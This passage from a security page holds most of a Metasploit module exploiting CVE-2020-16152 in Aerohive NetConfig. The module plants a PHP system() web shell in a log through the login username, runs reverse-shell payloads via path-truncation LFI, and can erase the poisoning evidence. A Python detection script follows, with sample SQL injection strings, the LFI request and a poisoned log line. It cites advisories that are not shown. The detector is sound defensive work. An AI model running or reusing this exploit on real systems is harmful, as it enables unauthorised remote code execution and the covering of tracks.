This state can last over an hour.<br /><br /> This module has been successfully tested against Aerohive NetConfig<br /> versions 8.2r4 and 10.0r7a.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Erik de Jong', # github.com/eriknl - discovery and PoC<br /> 'Erik Wynter' # @wyntererik - Metasploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2020-16152'], # still categorized as RESERVED<br /> ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code<br /> ],<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> },<br /> 'Platform' => %w[linux unix],<br /> 'Arch' => [ ARCH_ARMLE, ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Linux', {<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Platform' => 'linux',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',<br /> 'CMDSTAGER::FLAVOR' => 'curl'<br /> }<br /> }<br /> ],<br /> [<br /> 'CMD', {<br /> 'Arch' => [ARCH_CMD],<br /> 'Platform' => 'unix',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target'<br /> }<br /> }<br /> ]<br /> ],<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2020-02-17',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options [<br /> OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']),<br /> OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! 
This may render the target unexploitable', false]),<br /> ]<br /> end<br /><br /> def auto_clean_log<br /> datastore['AUTO_CLEAN_LOG']<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'index.php5')<br /> })<br /><br /> unless res<br /> return CheckCode::Unknown('Connection failed.')<br /> end<br /><br /> unless res.code == 200 && res.body.include?('Aerohive NetConfig UI')<br /> return CheckCode::Safe('Target is not an Aerohive NetConfig application.')<br /> end<br /><br /> version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first<br /> unless version<br /> return CheckCode::Detected('Could not determine Aerohive NetConfig version.')<br /> end<br /><br /> begin<br /> if Rex::Version.new(version) <= Rex::Version.new('10.0r8a')<br /> return CheckCode::Appears("The target is Aerohive NetConfig version #{version}")<br /> else<br /> print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.')<br /> return CheckCode::Safe("The target is Aerohive NetConfig version #{version}")<br /> end<br /> rescue StandardError => e<br /> return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}")<br /> end<br /> end<br /><br /> def poison_log<br /> password = rand_text_alphanumeric(8..12)<br /> @shell_cmd_name = rand_text_alphanumeric(3..6)<br /> @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>"<br /><br /> # Poison /tmp/messages<br /> print_status('Attempting to poison the log at /tmp/messages...')<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'login.php5'),<br /> 'vars_post' => {<br /> 'login_auth' => 0,<br /> 'miniHiveUI' => 1,<br /> 'authselect' => 'Name/Password',<br /> 'userName' => @poison_cmd,<br /> 'password' => password<br /> }<br /> })<br /><br /> unless res<br /> fail_with(Failure::Disconnected, 
'Connection failed while trying to poison the log at /tmp/messages')<br /> end<br /><br /> unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==')<br /> fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages')<br /> end<br /><br /> print_status('Server responded as expected. Continuing...')<br /> end<br /><br /> def on_new_session(session)<br /> log_cleaned = false<br /> if auto_clean_log<br /> print_status('Attempting to clean the log file at /tmp/messages...')<br /> print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.')<br /> begin<br /> # We need to remove the line containing the PHP system call from /tmp/messages<br /> # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username.<br /> # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line<br /> # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same:<br /> # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period.<br /> line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}"<br /> clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}"<br /> cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\<br /> "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}"<br /><br /> if session.type.to_s.eql? 'meterpreter'<br /> session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'<br /><br /> session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"")<br /><br /> # Wait for cleanup<br /> Rex.sleep 5<br /><br /> # Check for the PHP system call in /tmp/messages<br /> messages_contents = session.fs.file.open('/tmp/messages').read.to_s<br /> # using =~ here produced unexpected results, so include? is used instead<br /> unless messages_contents.include?(@poison_cmd)<br /> log_cleaned = true<br /> end<br /> elsif session.type.to_s.eql?('shell')<br /> session.shell_command_token(cmds_to_clean_log.to_s)<br /><br /> # Check for the PHP system call in /tmp/messages<br /> poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'")<br /> # using =~ here produced unexpected results, so include? is used instead<br /> unless poison_evidence.include?(@poison_cmd)<br /> log_cleaned = true<br /> end<br /> end<br /> rescue StandardError => e<br /> print_error("Error during cleanup: #{e.message}")<br /> ensure<br /> super<br /> end<br /><br /> unless log_cleaned<br /> print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages")<br /> end<br /> end<br /><br /> if log_cleaned<br /> print_good('Successfully cleaned up the log by deleting the line with the PHP syscall from /tmp/messages.')<br /> else<br /> print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}")<br /> print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. 
This state can last over an hour.')<br /> print_warning('Deleting /tmp/messages or clearing out the file may break the application.')<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> print_status('Attempting to execute the payload')<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'action.php5'),<br /> 'vars_get' => {<br /> '_action' => 'list',<br /> 'debug' => 'true'<br /> },<br /> 'vars_post' => {<br /> '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation<br /> @shell_cmd_name => cmd<br /> }<br /> }, 0)<br /><br /> print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.')<br /> end<br /><br /> def exploit<br /> poison_log<br /> if target.arch.first == ARCH_CMD<br /> print_status('Executing the payload')<br /> execute_command(payload.encoded)<br /> else<br /> execute_cmdstager(background: true)<br /> end<br /> end<br />end<br /></code></pre>
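Added detection logic (not from any advisory or from the module above) that a SOC could run over request logs and over the appliance's own log: decoded parameter values are checked for the SLEEP()-style and quote-break injections quoted on this page, for the path-truncation LFI shape the module sends, and for a PHP open tag that marks a poisoned log entry. The two URLs are taken from the advisories above, the POST body is built the way the module builds its `_page` value, and the syslog line is invented for the demo.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

PHP_TAG = re.compile(r"<\?(php|=)", re.I)

# Each rule: (name, regex applied to the fully decoded value).
RULES = [
    ("time_based_sqli", re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I)),
    ("quote_boolean_sqli", re.compile(
        r"'\s*(\w+\s+)?(or|and)\s+[^=\s]+\s*=\s*\S+|\b(or|and)\s+'[^']*'\s*=\s*'", re.I)),
    ("php_tag_in_input", PHP_TAG),
    ("path_traversal", re.compile(r"(\.\./){3,}|(\.\.\\){3,}")),
]
LONG_VALUE = 4000   # the truncation payload needs thousands of bytes of padding


def decode(value: str) -> str:
    """Decode twice so single and double URL-encoding land on the same text."""
    return unquote_plus(unquote_plus(value))


def extract_values(url: str, body: str = "") -> list:
    """The decoded path plus every parameter value from the query string and
    from a form-encoded body."""
    parts = urlsplit(url)
    values = [decode(parts.path)]
    values += [decode(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    values += [decode(v) for _, v in parse_qsl(body, keep_blank_values=True)]
    return values


def scan_request(url: str, body: str = "") -> set:
    """Return the names of all rules that fire on any value of the request."""
    hits = set()
    for value in extract_values(url, body):
        hits.update(name for name, rx in RULES if rx.search(value))
        if len(value) > LONG_VALUE:
            hits.add("oversized_value")
    return hits


def scan_log_line(line: str) -> set:
    """Appliance log check: a PHP open tag stored as a username or other field
    is never legitimate and is the trace the module's log poisoning leaves."""
    return {"php_tag_in_input"} if PHP_TAG.search(line) else set()


# Constructed samples: (url, body). Names identify the advisory each mirrors.
SAMPLES = {
    "odlms_sqli": ("/odlms/?page=appointments/view_appointment&id=1%27%20AND%20(SELECT%208053"
                   "%20FROM%20(SELECT(SLEEP(7)))dJOC)%20AND%20%27test%27=%27test", ""),
    "agenttesla_sqli": ("/AgentTeslaBuilder/server_side/scripts/server_processing.php"
                        "?table=%27HELL%20OR%201=1", ""),
    "netconfig_lfi": ("/action.php5?_action=list&debug=true",
                      "_page=x" + "/.." * 8 + "/" * 4041 + "/tmp/messages&abc=id"),
    "benign": ("/odlms/?page=appointments/view_appointment&id=12", ""),
}
# Invented syslog-style line showing what a poisoned /tmp/messages entry contains.
POISONED_LINE = "Dec 14 20:26:47 netconfig login: user <?php system($_POST['abc']);?> failed authentication"


def scan_samples() -> dict:
    return {name: scan_request(url, body) for name, (url, body) in SAMPLES.items()}
```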